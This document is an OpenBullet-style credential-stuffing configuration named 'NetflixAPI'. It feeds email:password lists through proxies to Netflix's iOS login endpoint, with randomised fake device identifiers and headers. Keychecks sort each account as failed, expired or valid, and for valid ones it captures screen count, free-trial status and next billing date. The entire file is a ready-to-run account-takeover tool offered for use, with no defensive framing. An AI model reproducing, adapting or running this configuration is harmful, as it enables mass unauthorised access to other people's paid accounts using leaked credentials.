[SETTINGS]
{
  "Name": "NetflixAPI",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-05-09T00:27:14.6696177+02:00",
  "AdditionalInfo": "Capture: Number of Screens, IsInFreeTrial & Next Billing Date",
  "Author": "Dedrilath",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION URLEncode "{\"action\":\"loginAction\",\"fields\":{\"userLoginId\":\"<USER>\",\"rememberMe\":\"true\",\"password\":\"<PASS>\"},\"verb\":\"POST\",\"mode\":\"login\",\"flow\":\"appleSignUp\"}" -> VAR "login" 

FUNCTION RandomString "?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "aae" 

FUNCTION RandomNum 1 13 "<rda>" -> VAR "rda" 

FUNCTION RandomNum 200 999 "<aa>" -> VAR "aa" 

REQUEST POST "https://ios.prod.ftl.netflix.com/iosui/user/12.17" 
  CONTENT "appInternalVersion=12.17.0&appVersion=12.17.0&callPath=%5B%22moneyball%22%2C%22appleSignUp%22%2C%22next%22%5D&config=%7B%22useSecureImages%22%3Atrue%2C%22billboardTrailerEnabled%22%3A%22false%22%2C%22clipsEnabled%22%3A%22false%22%2C%22titleCapabilityFlattenedShowEnabled%22%3A%22true%22%2C%22previewsBrandingEnabled%22%3A%22true%22%2C%22seasonRenewalPostPlayEnabled%22%3A%22true%22%2C%22aroGalleriesEnabled%22%3A%22true%22%2C%22interactiveFeatureSugarPuffsEnabled%22%3A%22true%22%2C%22showMoreDirectors%22%3Atrue%2C%22isDPShortPreviewEnabled%22%3Afalse%2C%22isDPAutoPlayIntoTitleEnabled%22%3Afalse%2C%22billboardEnabled%22%3A%22true%22%2C%22interactiveFeaturePIBEnabled%22%3A%22true%22%2C%22interactiveDataGatewayEnabled%22%3A%22true%22%2C%22warmerHasGenres%22%3Atrue%2C%22previewsRowEnabled%22%3A%22true%22%2C%22interactiveFeatureBadgeIconTestEnabled%22%3A%229.57.0%22%2C%22kidsMyListEnabled%22%3A%22true%22%2C%22isDPaudioSilencedByDefault%22%3Afalse%2C%22kidsBillboardEnabled%22%3A%22true%22%2C%22characterBarOnPhoneEnabled%22%3A%22true%22%2C%22contentWarningEnabled%22%3A%22true%22%2C%22postplayProductizationEnabled%22%3A%22true%22%2C%22bigRowEnabled%22%3A%22true%22%2C%22videoMerchInDPEnabled%22%3A%22false%22%2C%22interactiveFeatureAppUpdateDialogueEnabled%22%3A%22false%22%2C%22familiarityUIEnabled%22%3A%22false%22%2C%22bigrowNewUIEnabled%22%3A%22false%22%2C%22isAccountProfileLinkEnabled%22%3Afalse%2C%22interactiveFeatureTemplatesPrePlayEnabled%22%3A%22true%22%2C%22interactiveFeatureSugarPuffsPreplayEnabled%22%3A%22true%22%2C%22interactiveFeatureTemplatesEnabled%22%3A%22true%22%2C%22motionCharacterEnabled%22%3A%22true%22%2C%22billboardKidsTrailerEnabled%22%3A%22false%22%2C%22roarEnabled%22%3A%22true%22%2C%22topTenListEnabled%22%3A%22false%22%2C%22mobileCollectionsEnabled%22%3A%22false%22%2C%22previewsInBillboardEnabled%22%3A%22false%22%2C%22interactiveFeatureMinecraftEnabled%22%3A%22true%22%2C%22isCreatorHomeForRMEnabled%22%3A%22true%22%2C%22kidsParityLolomoDefaultsEnabled%22%3A%22false%22%2C%22titleGroupsRowPatchedEnabled%22%3A%22false%22%2C%22isDPInlineMerchEnabled%22%3Afalse%2C%22interactiveFeatureYouVsWildEnabled%22%3A%22true%22%2C%22mobileCollectionsTitleGroupsEnabled%22%3A%22false%22%2C%22kidsTrailers%22%3Atrue%2C%22isDPMerchButtonEnabled%22%3Afalse%7D&device_type=NFAPPL-02-&esn=NFAPPL-02-IPHONE<rda>%3D1-EB0874<aae>F1E4<aae>0F3034F05DF19404<aae>11&idiom=phone&iosVersion=13.3.1&isTablet=false&kids=false&languages=en-US&locale=en-US&maxDeviceWidth=375&method=call&model=saget&modelType=IPHONE8-1&odpAware=true&param=<login>&pathFormat=graph&pixelDensity=2.0&progressive=false&responseFormat=json" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "X-Netflix.Argo.abTests: 22<aa>:6|1<aa>9:5" 
  HEADER "X-Netflix.client.appVersion: 12.17.0" 
  HEADER "X-Netflix.Argo.NFNSM: 9" 
  HEADER "Connection: close" 
  HEADER "Accept-Language: en-CA;q=1" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "X-Netflix.esn: NFAPPL-02-IPHONE8=1-EB0874<aae>F1E4<aae>0F3034F05DF19404<aae>11" 
  HEADER "X-Netflix.client.idiom: phone" 
  HEADER "X-Netflix.Request.Routing: {\"path\":\"/nq/iosui/argo/~12.17.0/user\",\"control_tag\":\"iosui_argo\"}" 
  HEADER "User-Agent: Argo/12.17.0 (iPhone; iOS 13.3.1; Scale/2.00)" 
  HEADER "X-Netflix.request.client.user.guid: _fake-guid-for-activate" 
  HEADER "X-Netflix.client.type: argo" 
  HEADER "X-Netflix.Request.Attempt: 1" 
  HEADER "X-Netflix.client.iosVersion: 13.3.1" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"membershipStatus\":\"ANONYMOUS\"" 
    KEY "\"membershipStatus\":\"NEVER_MEMBER\"" 
    KEY "\"mode\":\"login\"" 
    KEY "unrecognized_email_consumption_only" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "\"membershipStatus\":\"FORMER_MEMBER\"" 
    KEY "mode\":\"welcome\"" 
    KEY "{\"slidingDoors\"" 
  KEYCHAIN Success OR 
    KEY "\"membershipStatus\":\"CURRENT_MEMBER\"" 
    KEY "mode\":\"memberHome" 
    KEY "\"value\":[\"CC\",\"PARTNER_PAYMENT\"]}}" 

REQUEST GET "https://www.netflix.com/YourAccount?" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "\"maxStreams\":" "," CreateEmpty=FALSE -> CAP "screens" 

PARSE "<SOURCE>" LR "\"isInFreeTrial\":" "," CreateEmpty=FALSE -> CAP "isInFreeTrial" 

PARSE "<SOURCE>" LR "\"nextBillingDate\":\"" "\"" -> VAR "next billing" 

FUNCTION Replace "\\x2F" "/" "<next billing>" -> CAP "next billing" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "| isInFreeTrial = null | next billing = " 

